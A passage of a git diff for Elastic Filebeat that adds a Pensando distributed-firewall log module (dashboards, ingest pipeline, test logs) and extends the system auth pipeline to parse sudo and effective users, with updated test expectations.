"2aa5d850-cc85-11ea-918e-c778f7abe5d7", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [], + "type": "visualization", + "updated_at": "2020-09-10T21:54:41.152Z", + "version": "WzI0ODAsMTFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "savedSearchRefName": "search_0", + "title": "Top Destination IPs [Filebeat Pensando]", + "uiStateJSON": {}, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "destination.ip", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": true, + "otherBucketLabel": "Other", + "size": 10 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTooltip": true, + "isDonut": false, + "labels": { + "last_level": true, + "show": false, + "truncate": 100, + "values": true + }, + "legendPosition": "right", + "type": "pie" + }, + "title": "Top Destination IPs [Filebeat Pensando]", + "type": "pie" + } + }, + "id": "b8bfd3e0-e8b7-11ea-ba07-c1efedbf0bf9", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [ + { + "id": "0d0216f0-2fe0-11e7-9d02-3f49bde5c1d5", + "name": "search_0", + "type": "search" + } + ], + "type": "visualization", + "updated_at": "2020-09-10T21:59:43.129Z", + "version": "WzI0OTYsMTFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "Destination Port by DSC Pie [Filebeat Pensando]", + "uiStateJSON": {}, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": {}, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "field": "destination.port", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": true, + "otherBucketLabel": "Other", + "size": 25 + }, + "schema": "segment", + "type": "terms" + }, + { + "enabled": true, + "id": "3", + "params": { + "field": "log.source.address", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 10 + }, + "schema": "segment", + "type": "terms" + } + ], + "params": { + "addLegend": true, + "addTooltip": true, + "isDonut": true, + "labels": { + "last_level": true, + "show": false, + "truncate": 100, + "values": true + }, + "legendPosition": "right", + "type": "pie" + }, + "title": "Destination Port by DSC Pie [Filebeat Pensando]", + "type": "pie" + } + }, + "id": "c6188140-cdb9-11ea-a0ef-8f5241e594be", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "type": "visualization", + "updated_at": "2020-09-10T21:58:55.571Z", + "version": "WzI0OTQsMTFd" + }, + { + "attributes": { + "description": "", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.index", + "query": { + "language": "kuery", + "query": "" + } + } + }, + "title": "Top Destinations - table [Filebeat Pensando]", + "uiStateJSON": { + "vis": { + "params": { + "sort": { + "columnIndex": null, + "direction": null + } + } + } + }, + "version": 1, + "visState": { + "aggs": [ + { + "enabled": true, + "id": "1", + "params": { + "customLabel": "Network Packets" + }, + "schema": "metric", + "type": "count" + }, + { + "enabled": true, + "id": "2", + "params": { + "customLabel": "Top Servers", + "field": "server.ip", + "missingBucket": false, + "missingBucketLabel": "Missing", + "order": "desc", + "orderBy": "1", + "otherBucket": false, + "otherBucketLabel": "Other", + "size": 300 + }, + "schema": "bucket", + "type": "terms" + } + ], + "params": { + "perPage": 10, + "percentageCol": "", + "showMetricsAtAllLevels": true, + "showPartialRows": true, + "showTotal": false, + "sort": { + "columnIndex": null, + "direction": null + }, + "totalFunc": "sum" + }, + "title": "Top Destinations - table [Filebeat Pensando]", + "type": "table" + } + }, + "id": "0583e120-cc8f-11ea-918e-c778f7abe5d7", + "migrationVersion": { + "visualization": "7.8.0" + }, + "references": [ + { + "id": "filebeat-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.index", + "type": "index-pattern" + } + ], + "type": "visualization", + "updated_at": "2020-09-10T22:27:54.232Z", + "version": "WzI1NTAsMTFd" + } + ], + "version": "7.8.0" +} diff --git a/filebeat/module/pensando/dfw/_meta/fields.yml b/filebeat/module/pensando/dfw/_meta/fields.yml new file mode 100644 index 000000000000..72422c321214 --- /dev/null +++ b/filebeat/module/pensando/dfw/_meta/fields.yml @@ -0,0 +1,55 @@ +- name: dfw + type: group + release: beta + default_field: false + description: > + Fields for Pensando DFW + fields: + - name: action + type: keyword + description: > + Action on the flow. + - name: app_id + type: integer + description: > + Application ID + - name: destination_address + type: keyword + description: > + Address of destination. + - name: destination_port + type: integer + description: > + Port of destination. + - name: direction + type: keyword + description: > + Direction of the flow + - name: protocol + type: keyword + description: > + Protocol of the flow + - name: rule_id + type: keyword + description: > + Rule ID that was matched. + - name: session_id + type: integer + description: > + Session ID of the flow + - name: session_state + type: keyword + description: > + Session state of the flow. + - name: source_address + type: keyword + description: > + Source address of the flow. + - name: source_port + type: integer + description: > + Source port of the flow. + - name: timestamp + type: date + description: > + Timestamp of the log. diff --git a/filebeat/module/pensando/dfw/config/dfw.yml b/filebeat/module/pensando/dfw/config/dfw.yml new file mode 100644 index 000000000000..404eac5f138f --- /dev/null +++ b/filebeat/module/pensando/dfw/config/dfw.yml @@ -0,0 +1,23 @@ +{{ if eq .input "syslog" }} + +type: udp +udp: +host: "{{.syslog_host}}:{{.syslog_port}}" + +{{ else if eq .input "file" }} + +type: log +paths: +{{ range $i, $path := .paths }} + - {{$path}} +{{ end }} +exclude_files: [".gz$"] + +{{ end }} + +processors: + - add_locale: ~ + - add_fields: + target: '' + fields: + ecs.version: 1.7.0 diff --git a/filebeat/module/pensando/dfw/ingest/pipeline.yml b/filebeat/module/pensando/dfw/ingest/pipeline.yml new file mode 100644 index 000000000000..c8d1d57792fa --- /dev/null +++ b/filebeat/module/pensando/dfw/ingest/pipeline.yml @@ -0,0 +1,218 @@ +--- +description: Pipeline for parsing Penando DFW logs +processors: +- set: + field: event.ingested + value: "{{_ingest.timestamp}}" +- rename: + field: message + target_field: event.original +- grok: + field: event.original + patterns: + - "%{SYSLOG5424PRI}%{NONNEGINT:syslog5424_ver} +(?:%{TIMESTAMP_ISO8601:syslog5424_ts}|-) +(?:%{IPORHOST:syslog5424_host}|-) +(-|%{SYSLOG5424PRINTASCII:syslog5424_app}) +(-|%{SYSLOG5424PRINTASCII:syslog5424_proc}) +(?::-|%{SYSLOG5424PRINTASCII:syslog5424_msgid}) +\\[%{GREEDYDATA:payload_raw}\\]$" +- json: + field: payload_raw + target_field: json +- remove: + field: [syslog5424_sd,syslog5424_app,syslog5424_host,syslog5424_msgid,syslog5424_pri,syslog5424_proc,syslog5424_ver,host] + ignore_missing: true +- date: + field: json.time + target_field: '@timestamp' + ignore_failure: true + formats: + - ISO8601 +- rename: + field: json.action + target_field: pensando.dfw.action + ignore_failure: true +- rename: + field: json.app-id + target_field: pensando.dfw.app_id + ignore_failure: true +- rename: + field: json.destaddr + target_field: pensando.dfw.destination_address + ignore_failure: true +- rename: + field: json.destport + target_field: pensando.dfw.destination_port + ignore_failure: true +- rename: + field: json.direction + target_field: pensando.dfw.direction + ignore_failure: true +- rename: + field: json.protocol + target_field: pensando.dfw.protocol + ignore_failure: true +- rename: + field: json.rule-id + target_field: pensando.dfw.rule_id + ignore_failure: true +- rename: + field: json.session-id + target_field: pensando.dfw.session_id + ignore_failure: true +- rename: + field: json.session-state + target_field: pensando.dfw.session_state + ignore_failure: true +- rename: + field: json.srcaddr + target_field: pensando.dfw.source_address + ignore_failure: true +- rename: + field: json.srcport + target_field: pensando.dfw.source_port + ignore_failure: true +- set: + field: event.category + value: ['network'] +- set: + field: observer.vendor + value: Pensando Systems +- set: + field: observer.type + value: 'firewall' +- set: + field: observer.product + value: 'Distributed Services Platform' +- set: + field: network.type + value: 'ipv4' +- set: + field: network.transport + value: '{{pensando.dfw.protocol}}' + ignore_failure: true +- lowercase: + field: network.transport + ignore_missing: true + ignore_failure: true +- set: + field: source.address + value: "{{pensando.dfw.source_address}}" + ignore_failure: true + ignore_empty_value: true +- convert: + field: pensando.dfw.source_port + target_field: source.port + type: integer + ignore_failure: true + ignore_missing: true +- set: + field: destination.address + value: "{{pensando.dfw.destination_address}}" + ignore_failure: true + ignore_empty_value: true +- convert: + field: pensando.dfw.destination_port + target_field: destination.port + type: integer + ignore_failure: true + ignore_missing: true +- set: + field: client.ip + value: '{{pensando.dfw.source_address}}' + ignore_failure: true + if: ctx.pensando.dfw?.source_port > ctx.pensando.dfw?.destination_port +- set: + field: client.ip + value: '{{pensando.dfw.destination_address}}' + ignore_failure: true + if: ctx.pensando.dfw?.destination_port > ctx.pensando.dfw?.source_port +- set: + field: client.ip + value: '{{pensando.dfw.source_address}}' + ignore_failure: true + if: ctx.pensando.dfw?.protocol == 'ICMP' +- set: + field: server.ip + value: '{{pensando.dfw.source_address}}' + ignore_failure: true + if: ctx.pensando.dfw?.source_port < ctx.pensando.dfw?.destination_port +- set: + field: server.ip + value: '{{pensando.dfw.destination_address}}' + ignore_failure: true + if: ctx.pensando.dfw?.destination_port < ctx.pensando.dfw?.source_port +- set: + field: server.ip + value: '{{pensando.dfw.destination_address}}' + ignore_failure: true + if: ctx.pensando.dfw?.protocol == 'ICMP' +- set: + field: server.port + value: '{{pensando.dfw.source_port}}' + ignore_failure: true + if: ctx.pensando.dfw?.source_port < ctx.pensando.dfw?.destination_port +- set: + field: server.port + value: '{{pensando.dfw.destination_port}}' + ignore_failure: true + if: ctx.pensando.dfw?.destination_port < ctx.pensando.dfw?.source_port +- set: + field: server.port + value: 0 + ignore_failure: true + if: ctx.pensando.dfw?.protocol == 'ICMP' +- set: + field: event.kind + value: 'event' +- set: + field: event.action + value: 'allowed' + if: '[''allow''].contains(ctx.pensando.dfw?.action)' +- set: + field: rule.id + value: '{{pensando.dfw.rule_id}}' + ignore_failure: true +- set: + field: event.outcome + value: success + if: '[''allow'', ''deny''].contains(ctx.pensando.dfw?.action)' +- set: + field: event.action + value: denied + if: '[''deny''].contains(ctx.pensando.dfw?.action)' +- set: + field: event.type + value: ['connection', 'allowed'] + if: '[''allow''].contains(ctx.pensando.dfw?.action)' + ignore_failure: true +- set: + field: event.type + value: ['connection', 'denied'] + if: '[''deny''].contains(ctx.pensando.dfw?.action)' + ignore_failure: true +- geoip: + field: pensando.dfw.source_address + target_field: source.geo + ignore_missing: true +- geoip: + database_file: GeoLite2-ASN.mmdb + field: pensando.dfw.source_address + target_field: source.as + properties: + - asn + - organization_name + ignore_missing: true +- rename: + field: source.as.asn + target_field: source.as.number + ignore_missing: true +- rename: + field: source.as.organization_name + target_field: source.as.organization.name + ignore_missing: true +- remove: + field: + - syslog5424_ts + - json + - payload_raw + ignore_missing: true +on_failure: +- set: + field: error.message + value: '{{ _ingest.on_failure_message }}' diff --git a/filebeat/module/pensando/dfw/manifest.yml b/filebeat/module/pensando/dfw/manifest.yml new file mode 100644 index 000000000000..5de3a9735476 --- /dev/null +++ b/filebeat/module/pensando/dfw/manifest.yml @@ -0,0 +1,13 @@ +module_version: 1.0 + +var: + - name: syslog_host + default: 0.0.0.0 + - name: syslog_port + default: 9001 + - name: input + default: syslog + +ingest_pipeline: + - ingest/pipeline.yml +input: config/dfw.yml diff --git a/filebeat/module/pensando/dfw/test/test.log b/filebeat/module/pensando/dfw/test/test.log new file mode 100644 index 000000000000..bf582967660e --- /dev/null +++ b/filebeat/module/pensando/dfw/test/test.log @@ -0,0 +1,3 @@ +<14>1 2020-12-14T18:41:01Z esx01-dsc pen-tmagent 1402 - [{"time":"2020-12-14T18:41:01Z","destaddr":"10.29.95.101","destport":80,"srcaddr":"10.29.95.102","srcport":46554,"protocol":"TCP","action":"allow","direction":"from-host","rule-id":5413257681574708646,"session-id":6881552,"session-state":"flow_create"}] +<14>1 2020-12-14T18:41:16Z esx01-dsc pen-tmagent 1402 - [{"time":"2020-12-14T18:41:16Z","destaddr":"10.29.95.101","destport":80,"srcaddr":"10.29.95.102","srcport":46594,"protocol":"TCP","action":"allow","direction":"from-host","rule-id":5413257681574708646,"session-id":6881572,"session-state":"flow_create"}] +<14>1 2020-12-14T18:41:16Z esx01-dsc pen-tmagent 1402 - [{"time":"2020-12-14T18:41:16Z","destaddr":"10.29.95.101","destport":80,"srcaddr":"10.29.95.102","srcport":46582,"protocol":"TCP","action":"allow","direction":"from-host","rule-id":5413257681574708646,"session-id":6881566,"session-state":"flow_create"}] diff --git a/filebeat/module/pensando/dfw/test/test.log-expected.json b/filebeat/module/pensando/dfw/test/test.log-expected.json new file mode 100644 index 000000000000..d43ffdea29c5 --- /dev/null +++ b/filebeat/module/pensando/dfw/test/test.log-expected.json @@ -0,0 +1,134 @@ +[ + { + "@timestamp": "2020-12-14T18:41:01.000Z", + "client.ip": "10.29.95.102", + "destination.address": "10.29.95.101", + "destination.port": 80, + "event.action": "allowed", + "event.category": [ + "network" + ], + "event.dataset": "pensando.dfw", + "event.kind": "event", + "event.module": "pensando", + "event.original": "<14>1 2020-12-14T18:41:01Z esx01-dsc pen-tmagent 1402 - [{\"time\":\"2020-12-14T18:41:01Z\",\"destaddr\":\"10.29.95.101\",\"destport\":80,\"srcaddr\":\"10.29.95.102\",\"srcport\":46554,\"protocol\":\"TCP\",\"action\":\"allow\",\"direction\":\"from-host\",\"rule-id\":5413257681574708646,\"session-id\":6881552,\"session-state\":\"flow_create\"}]", + "event.outcome": "success", + "event.timezone": "-02:00", + "event.type": [ + "connection", + "allowed" + ], + "fileset.name": "dfw", + "input.type": "log", + "log.offset": 0, + "network.transport": "tcp", + "network.type": "ipv4", + "observer.product": "Distributed Services Platform", + "observer.type": "firewall", + "observer.vendor": "Pensando Systems", + "pensando.dfw.action": "allow", + "pensando.dfw.destination_address": "10.29.95.101", + "pensando.dfw.destination_port": 80, + "pensando.dfw.direction": "from-host", + "pensando.dfw.protocol": "TCP", + "pensando.dfw.rule_id": 5413257681574708646, + "pensando.dfw.session_id": 6881552, + "pensando.dfw.session_state": "flow_create", + "pensando.dfw.source_address": "10.29.95.102", + "pensando.dfw.source_port": 46554, + "rule.id": "5413257681574708646", + "server.ip": "10.29.95.101", + "server.port": "80", + "service.type": "pensando", + "source.address": "10.29.95.102", + "source.port": 46554 + }, + { + "@timestamp": "2020-12-14T18:41:16.000Z", + "client.ip": "10.29.95.102", + "destination.address": "10.29.95.101", + "destination.port": 80, + "event.action": "allowed", + "event.category": [ + "network" + ], + "event.dataset": "pensando.dfw", + "event.kind": "event", + "event.module": "pensando", + "event.original": "<14>1 2020-12-14T18:41:16Z esx01-dsc pen-tmagent 1402 - [{\"time\":\"2020-12-14T18:41:16Z\",\"destaddr\":\"10.29.95.101\",\"destport\":80,\"srcaddr\":\"10.29.95.102\",\"srcport\":46594,\"protocol\":\"TCP\",\"action\":\"allow\",\"direction\":\"from-host\",\"rule-id\":5413257681574708646,\"session-id\":6881572,\"session-state\":\"flow_create\"}]", + "event.outcome": "success", + "event.timezone": "-02:00", + "event.type": [ + "connection", + "allowed" + ], + "fileset.name": "dfw", + "input.type": "log", + "log.offset": 311, + "network.transport": "tcp", + "network.type": "ipv4", + "observer.product": "Distributed Services Platform", + "observer.type": "firewall", + "observer.vendor": "Pensando Systems", + "pensando.dfw.action": "allow", + "pensando.dfw.destination_address": "10.29.95.101", + "pensando.dfw.destination_port": 80, + "pensando.dfw.direction": "from-host", + "pensando.dfw.protocol": "TCP", + "pensando.dfw.rule_id": 5413257681574708646, + "pensando.dfw.session_id": 6881572, + "pensando.dfw.session_state": "flow_create", + "pensando.dfw.source_address": "10.29.95.102", + "pensando.dfw.source_port": 46594, + "rule.id": "5413257681574708646", + "server.ip": "10.29.95.101", + "server.port": "80", + "service.type": "pensando", + "source.address": "10.29.95.102", + "source.port": 46594 + }, + { + "@timestamp": "2020-12-14T18:41:16.000Z", + "client.ip": "10.29.95.102", + "destination.address": "10.29.95.101", + "destination.port": 80, + "event.action": "allowed", + "event.category": [ + "network" + ], + "event.dataset": "pensando.dfw", + "event.kind": "event", + "event.module": "pensando", + "event.original": "<14>1 2020-12-14T18:41:16Z esx01-dsc pen-tmagent 1402 - [{\"time\":\"2020-12-14T18:41:16Z\",\"destaddr\":\"10.29.95.101\",\"destport\":80,\"srcaddr\":\"10.29.95.102\",\"srcport\":46582,\"protocol\":\"TCP\",\"action\":\"allow\",\"direction\":\"from-host\",\"rule-id\":5413257681574708646,\"session-id\":6881566,\"session-state\":\"flow_create\"}]", + "event.outcome": "success", + "event.timezone": "-02:00", + "event.type": [ + "connection", + "allowed" + ], + "fileset.name": "dfw", + "input.type": "log", + "log.offset": 622, + "network.transport": "tcp", + "network.type": "ipv4", + "observer.product": "Distributed Services Platform", + "observer.type": "firewall", + "observer.vendor": "Pensando Systems", + "pensando.dfw.action": "allow", + "pensando.dfw.destination_address": "10.29.95.101", + "pensando.dfw.destination_port": 80, + "pensando.dfw.direction": "from-host", + "pensando.dfw.protocol": "TCP", + "pensando.dfw.rule_id": 5413257681574708646, + "pensando.dfw.session_id": 6881566, + "pensando.dfw.session_state": "flow_create", + "pensando.dfw.source_address": "10.29.95.102", + "pensando.dfw.source_port": 46582, + "rule.id": "5413257681574708646", + "server.ip": "10.29.95.101", + "server.port": "80", + "service.type": "pensando", + "source.address": "10.29.95.102", + "source.port": 46582 + } +] \ No newline at end of file diff --git a/filebeat/module/pensando/fields.go b/filebeat/module/pensando/fields.go new file mode 100644 index 000000000000..e791a74dfa93 --- /dev/null +++ b/filebeat/module/pensando/fields.go @@ -0,0 +1,36 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +// Code generated by beats/dev-tools/cmd/asset/asset.go - DO NOT EDIT. + +package pensando + +import ( + "github.com/elastic/beats/v7/libbeat/asset" +) + +func init() { + if err := asset.SetFields("filebeat", "pensando", asset.ModuleFieldsPri, AssetPensando); err != nil { + panic(err) + } +} + +// AssetPensando returns asset data. +// This is the base64 encoded gzipped contents of module/pensando. +func AssetPensando() string { + return "eJy0k92qnDAQx+99inmBsw/gRaGwHOhFYekp9FJSM3HDiU5IRmTfviSrbrSR/aidy5n4//+cjzf4xEsJFjsvOkkFAGs2WMJpzEABINHXTlvW1JXwpQCA+QP4TrI3WAAojUb6MlbfoBMtLmRD8MViCY2j3o6ZjHKI96gFylF7AzHU+MP4JDVLDaUaYE7mDEM4NCg8lvAbWSR5iUr0hqsoXoISxuOinGVNcMndaI/vv5Ina96UWdRBclGayD/xMpCTq9o2SIyvUQ+oAz4jKEPDAfLG1lZ6LX411h1jgw6edLbW6FpE+2/HvKlEz7qLbyohpUPv1y6Lf38WYZQklTptNCBlseQ4D/JaL05B7zEK7fA6sv124DhrkprXIG9vHTHVZHZ0P02Sd81db7DSfw35XzbgR28wbB+fBcMgPLSC6zPKje579D7Mfwvitel/XFUDx90eTASeBeOOjZgYom6KsdUJ6l2N/+MoP6IyiNttPoay902OHHY8zTsQrFv0LFqbR5Chq8/5/5wVR3dDzQGKPwEAAP//dBvr3Q==" +} diff --git a/filebeat/module/pensando/module.yml b/filebeat/module/pensando/module.yml new file mode 100644 index 000000000000..ed97d539c095 --- /dev/null +++ b/filebeat/module/pensando/module.yml @@ -0,0 +1 @@ +--- diff --git a/filebeat/module/postgresql/log/config/log.yml b/filebeat/module/postgresql/log/config/log.yml index 9d11854bf577..c33a4ad8de4f 100644 --- a/filebeat/module/postgresql/log/config/log.yml +++ b/filebeat/module/postgresql/log/config/log.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/redis/log/config/log.yml b/filebeat/module/redis/log/config/log.yml index a24f976513f4..e9de5bfce494 100644 --- a/filebeat/module/redis/log/config/log.yml +++ b/filebeat/module/redis/log/config/log.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/santa/log/config/file.yml b/filebeat/module/santa/log/config/file.yml index 6fcf0ab7a1f6..2db4213af7b4 100644 --- a/filebeat/module/santa/log/config/file.yml +++ b/filebeat/module/santa/log/config/file.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/system/auth/config/auth.yml b/filebeat/module/system/auth/config/auth.yml index d1d5c5935061..429067177d11 100644 --- a/filebeat/module/system/auth/config/auth.yml +++ b/filebeat/module/system/auth/config/auth.yml @@ -12,4 +12,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/system/auth/ingest/pipeline.yml b/filebeat/module/system/auth/ingest/pipeline.yml index 54ab0dbf8f5d..48d5ecb490db 100644 --- a/filebeat/module/system/auth/ingest/pipeline.yml +++ b/filebeat/module/system/auth/ingest/pipeline.yml @@ -36,6 +36,44 @@ processors: field: system.auth.message target_field: message ignore_missing: true + if: ctx?.system?.auth?.message != null && ctx?.system?.auth?.message != "" +- grok: + field: message + ignore_missing: true + ignore_failure: true + patterns: + - 'for user \"?%{DATA:_temp.foruser}\"? by \"?%{DATA:_temp.byuser}\"?(?:\(uid=%{NUMBER:_temp.byuid}\))?$' + - 'for user \"?%{DATA:_temp.foruser}\"?$' + - 'by user \"?%{DATA:_temp.byuser}\"?$' + if: ctx?.message != null && ctx?.message != "" +- rename: + field: _temp.byuser + target_field: user.name + ignore_missing: true + ignore_failure: true +- rename: + field: _temp.byuid + target_field: user.id + ignore_missing: true + ignore_failure: true +- rename: + field: _temp.foruser + target_field: user.name + ignore_missing: true + ignore_failure: true + if: ctx?.user?.name == null || ctx?.user?.name == "" +- rename: + field: _temp.foruser + target_field: user.effective.name + ignore_missing: true + ignore_failure: true + if: ctx?.user?.name != null +- convert: + field: system.auth.sudo.user + target_field: user.effective.name + type: string + ignore_failure: true + if: ctx?.system?.auth?.sudo?.user != null - set: field: source.ip value: '{{system.auth.ssh.dropped_ip}}' @@ -96,7 +134,7 @@ processors: source: >- if (ctx.system.auth.ssh.event == "Accepted") { ctx.event.type = ["authentication_success", "info"]; - ctx.event.category = ["authentication"]; + ctx.event.category = ["authentication","session"]; ctx.event.action = "ssh_login"; ctx.event.outcome = "success"; } else if (ctx.system.auth.ssh.event == "Invalid" || ctx.system.auth.ssh.event == "Failed") { @@ -137,16 +175,23 @@ processors: - append: field: related.user value: "{{user.name}}" - if: "ctx?.user?.name != null" + allow_duplicates: false + if: "ctx?.user?.name != null && ctx.user?.name != ''" +- append: + field: related.user + value: "{{user.effective.name}}" + allow_duplicates: false + if: "ctx?.user?.effective?.name != null && ctx.user?.effective?.name != ''" - append: field: related.ip value: "{{source.ip}}" - if: "ctx?.source?.ip != null" + allow_duplicates: false + if: "ctx?.source?.ip != null && ctx.source?.ip != ''" - append: field: related.hosts value: "{{host.hostname}}" - if: "ctx.host?.hostname != null && ctx.host?.hostname != ''" allow_duplicates: false + if: "ctx.host?.hostname != null && ctx.host?.hostname != ''" on_failure: - set: field: error.message diff --git a/filebeat/module/system/auth/test/auth-ubuntu1204.log-expected.json b/filebeat/module/system/auth/test/auth-ubuntu1204.log-expected.json index cff887d76e88..52501ff2a7c2 100644 --- a/filebeat/module/system/auth/test/auth-ubuntu1204.log-expected.json +++ b/filebeat/module/system/auth/test/auth-ubuntu1204.log-expected.json @@ -14,7 +14,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -30,13 +34,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-lhspyyxxlfzpytwsebjoegenjxyjombo; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675177.72-26828938879074/get_url; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675177.72-26828938879074/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -53,7 +59,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -69,7 +82,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -86,7 +103,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -102,13 +123,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-xspkubktopzqiwiofvdhqaglconkrgwp; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675181.24-158548606882799/get_url; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675181.24-158548606882799/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -125,7 +148,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -141,7 +171,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -158,7 +192,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -174,13 +212,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-vxcrqvczsrjrrsjcokculalhrgfsxqzl; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675202.4-199750250589919/command; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675202.4-199750250589919/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -197,7 +237,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -213,7 +260,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -230,7 +281,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -246,13 +301,15 @@ "precise32" ], "related.user": [ - "vagrant" + "vagrant", + "root" ], "service.type": "system", "system.auth.sudo.command": "/bin/sh -c echo BECOME-SUCCESS-gruorqbeefuuhfprfoqzsftalatgwwvf; LANG=en_US.UTF-8 LC_CTYPE=en_US.UTF-8 /usr/bin/python /home/vagrant/.ansible/tmp/ansible-tmp-1486675203.3-59927285912173/file; rm -rf /home/vagrant/.ansible/tmp/ansible-tmp-1486675203.3-59927285912173/ >/dev/null 2>&1", "system.auth.sudo.pwd": "/home/vagrant", "system.auth.sudo.tty": "pts/0", "system.auth.sudo.user": "root", + "user.effective.name": "root", "user.name": "vagrant" }, { @@ -269,7 +326,14 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant", + "root" + ], + "service.type": "system", + "user.effective.name": "root", + "user.id": "1000", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -285,7 +349,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "root" + ], + "service.type": "system", + "user.name": "root" }, { "event.dataset": "system.auth", @@ -302,7 +370,11 @@ "related.hosts": [ "precise32" ], - "service.type": "system" + "related.user": [ + "vagrant" + ], + "service.type": "system", + "user.name": "vagrant" }, { "event.dataset": "system.auth", @@ -318,13 +390,15 @@ "precise32" ], "related.user": [ - 